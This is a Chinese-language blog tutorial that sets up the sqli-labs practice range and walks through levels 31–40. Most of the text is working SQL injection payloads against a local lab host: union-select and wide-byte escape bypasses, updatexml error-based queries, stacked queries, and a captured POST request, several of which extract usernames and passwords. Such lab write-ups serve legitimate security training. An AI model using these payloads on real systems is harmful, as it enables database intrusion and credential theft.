AI 助理
文档备案控制台
开发者社区 开发与运维 文章 正文

sql-lib 搭建&31-40关

2022-12-02 417
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: sql-lib 搭建&31-40关

sql-lib靶场搭建-windows操作系统

下载phpstudy,下载地址:https://www.xp.cn/download.html

安装好

https://github.com/Audi-1/sqli-labs

将下载好后解压放到www下新建wwww.guiltyfet.com目录

同步hosts文件

第31关

在双引号后面添加括号进行闭合

http://www.guiltyfet.com/sqli/Less-31/?id=-1%22)union%20select%201,2,database()%20–+

或者

?id=1&id=0") union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23

区分大小写用%23闭合

获得用户名密码

http://www.guiltyfet.com/sqli/Less-31/?id=-1") union select 1,2,group_concat(username,0x7e,password) from users--+

第32关

这关是宽字节绕过引号转义

原理大概来说就是,一个双字节组成的字符,比如一个汉字‘我’的utf8编码为%E6%88%91 当我们使用?id=-1%E6’ 这样的构造时,’ 前面加的 \ 就会和%E6 合在一起,但是又不是一个正常汉字,但是起到了注掉 \ 的作用。

获得数据库名 ?id=-1%E6’ union select 1,version(),database() --+

在爆列的时候我们要用到‘user’,有单引号,我们用十六进制编码替代,users 使用十六进制编码得到7573657273,构造为0x7573657273

获取列名   ?id=-1%E6' union select 1,version(),group_concat(column_name) from information_schema.columns where table_name =0x7573657273--+

http://www.guiltyfet.com/sqli/Less-32/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+

第33关

和32一样

http://www.guiltyfet.com/sqli/Less-33/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+

第34关

获取数据库版本和数据库名 uname=admin%99’ union select version(),database()–+&passwd=admin&submit=Submit

POST /sqli/Less-34/ HTTP/1.1
Host: www.guiltyfet.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
Origin: http://www.guiltyfet.com
Connection: close
Referer: http://www.guiltyfet.com/sqli/Less-34/
Upgrade-Insecure-Requests: 1
uname=admin%99'  union select 1,group_concat(username,0x3b,password) from users#&passwd=admin&passwd=admin&submit=Submit

获取数据库密码

第35关

获得版名库名

http://www.guiltyfet.com/sqli/Less-35/?id=-1%20union%20select%201,version(),database()--+

获得表明

http://www.guiltyfet.com/sqli/Less-35/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆列名 ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#

爆用户名和密码

http://www.guiltyfet.com/sqli/Less-35/?id=-1%20union%20select%201,2,group_concat(username,0x3b,password)%20from%20users#

第36关

爆库

http://www.guiltyfet.com/sqli/Less-36/?id=0%bb' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

爆表

http://www.guiltyfet.com/sqli/Less-36/?id=0%bb' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),0x7e),1)--+

通过宽字节 %df 或者utf-16来解决

爆用户密码

http://www.guiltyfet.com/sqli/Less-36/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+

宽字节注入

第37关

输入admin/admin抓包

%bb’ union select 1,2#

爆库
uname=admin%bb' union select database(),user()#&passwd=admin&submit=Submit

爆表
uname=admin%bb' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=admin&submit=Submit

爆字段

admin%bb' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#

爆数据
uname=admin%bb' union select group_concat(username),group_concat(password) from users#
&passwd=admin&submit=Submit

第38关

http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,version(),database() %23

http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

获得列名
http://www.guiltyfet.com/sqli/Less-38/?id=?id=0%FE' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

获得数据
http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

新建表
http://www.guiltyfet.com/sqli/Less-38/?id=1';create table test like users;%23

在查询就有新建的表

第39关

http://www.guiltyfet.com/sqli/Less-39/?id=0%20union%20select%201,version(),database()%20%23

获得表名 ?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

获得列名 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

获取用户名密码 ?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

第40关

加括号,堆叠注入

获得列名
http://www.guiltyfet.com/sqli/Less-40/?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

爆数据
http://www.guiltyfet.com/sqli/Less-40/?id=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

文章标签:
Windows
数据安全/隐私保护
数据库
5q2a2sugf4ej6
目录
相关文章
游客ywuqqf7nwckr2
|
6月前
|
安全 网络协议 网络安全
2025年第十六届蓝桥杯网络安全CTF国赛总决赛真题详解Writeup(Web漏洞挖掘、Crypto密码学、Misc杂项、Reverse逆向、Pwn二进制漏洞)
2025年第十六届蓝桥杯网络安全CTF国赛总决赛真题详解Writeup(Web漏洞挖掘、Crypto密码学、Misc杂项、Reverse逆向、Pwn二进制漏洞)
游客ywuqqf7nwckr2
2165 0
2025年第十六届蓝桥杯网络安全CTF国赛总决赛真题详解Writeup(Web漏洞挖掘、Crypto密码学、Misc杂项、Reverse逆向、Pwn二进制漏洞)
Echo_Wish
|
12月前
|
机器学习/深度学习 人工智能 运维
让AI“接管”网络运维,效率提升不只是传说
让AI“接管”网络运维,效率提升不只是传说
Echo_Wish
977 16
bruce_xiaowei
|
安全 Ubuntu Linux
在DVWA靶机上从渗透到控制(weevely和中国蚁剑)
本文介绍如何使用Weevely工具对Ubuntu系统上的DVWA进行渗透测试,通过上传Webshell获取远程服务器控制权。实验环境为靶机IP 192.168.1.37(DVWA低安全等级)和攻击机Kali Linux IP 10.211.55.29。详细步骤包括Weevely安装、Webshell生成与上传、命令执行及提权尝试,并结合中国蚁剑进一步操作。文中强调合法授权和隐蔽性的重要性。
bruce_xiaowei
1661 0
在DVWA靶机上从渗透到控制(weevely和中国蚁剑)
1761360321912488
|
人工智能 测试技术 PyTorch
AI计算机视觉笔记二十四:YOLOP 训练+测试+模型评估
本文介绍了通过正点原子的ATK-3568了解并实现YOLOP(You Only Look Once for Panoptic Driving Perception)的过程,包括训练、测试、转换为ONNX格式及在ONNX Runtime上的部署。YOLOP由华中科技大学团队于2021年发布,可在Jetson TX2上达到23FPS,实现了目标检测、可行驶区域分割和车道线检测的多任务学习。文章详细记录了环境搭建、训练数据准备、模型转换和测试等步骤,并解决了ONNX转换过程中的问题。
1761360321912488
837 3
技术内容小助手
|
网络协议 网络架构
UDP报文结构详解:一篇文章带你搞懂
本文介绍了网络基础中的重要概念——UDP报文格式,包括源端口号、目的端口号、长度和检验和四个字段。UDP是一种无连接的传输层协议,简单高效但不可靠。文中还简要介绍了IP报文的重要字段,如版本、首部长度、服务类型、总长度、标识字段、生存时间和首部检验和。最后推荐了几本深入学习网络协议的书籍,帮助读者进一步理解相关知识。
技术内容小助手
1841 4
热爱技术的小郑
|
虚拟化
VM虚拟机只有一个C盘怎么添加硬盘新分区盘符
关于如何在VMware虚拟机中解决只有一个C盘的问题,介绍了增加硬盘和创建新分区的方法。
热爱技术的小郑
1391 1
VM虚拟机只有一个C盘怎么添加硬盘新分区盘符
游客qsxez56gggwqy
|
SQL Ubuntu Linux
安装和使用皮卡丘练习靶场
安装和使用皮卡丘练习靶场
游客qsxez56gggwqy
1198 1
gudanhero2018
|
数据采集 数据挖掘 数据处理
如何在Pandas中将索引(index)转换为数据列
如何在Pandas中将索引(index)转换为数据列
gudanhero2018
1282 0
Liuqz2009
|
Linux Shell 编译器
Linux0.11 内核体系结构(八)(上)
Linux0.11 内核体系结构(八)
Liuqz2009
320 0
Jay17
|
算法 安全 Linux
Ctfshow web入门 PHP特性篇 web89-web151 全(二)
Ctfshow web入门 PHP特性篇 web89-web151 全(二)
Jay17
633 0

热门文章

最新文章

  • 1
    拥抱开源,云原生时代下的开源牧码人的初心与坚守
  • 2
    AI自动检测视频中的人物,并替换成3D卡通角色模型案例
  • 3
    2018最新蚂蚁金服面试题:Docker+秒杀设计+RocketMQ+亿级数据设计
  • 4
    Java中线程池,你真的会用吗?
  • 5
    AI降成本利器!阿里云弹性加速计算实例来了,最高节省50%推理成本
  • 6
    linux命令学习——ps
  • 7
    【VNC】手工kill掉VNC进程的故障处理
  • 8
    4_4_MQTT 协议讲解|学习笔记
  • 9
    thinkphp基本知识之起步2
  • 10
    linux运维重要基础知识总结
  • 1
    OpenClaw多Agent团队搭建实战手册:(阿里云/本地保姆级部署+免费大模型API配置+避坑指南)
    175
  • 2
    OpenClaw有什么用?本地/阿里云部署+百炼集成+个股分析实战盈利及避坑指南
    96
  • 3
    从部署到落地!玩转OpenClaw 2026保姆级完整手册(阿里云/本地部署+百炼API配置+飞书集成)
    148
  • 4
    “养虾”不求人!OpenClaw从入门到精通(阿里云+本地部署+百炼API+命令大全+避坑指南)
    90
  • 5
    保姆级教学:OpenClaw(Clawdbot)从0到1落地:多系统部署+阿里云百炼集成+避坑指南
    65
  • 6
    AI效率革命!OpenClaw从入门到精通(阿里云/本地部署+百炼Coding Plan 配置+应用场景实战+常见问题解答)
    110
  • 7
    OpenClaw不“吃灰”指南:全平台部署+免费API配置+102个即用场景解析+避坑手册
    71
  • 8
    OpenClaw 部署保姆级实战教程:阿里云/MacOS/Linux/Windows本地搭建配置大模型api指南
    104
  • 9
    Java开发中5个提升效率的实用技巧
    51
  • 10
    几个提升Java开发效率的小技巧
    30

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    云安全中心:病毒查杀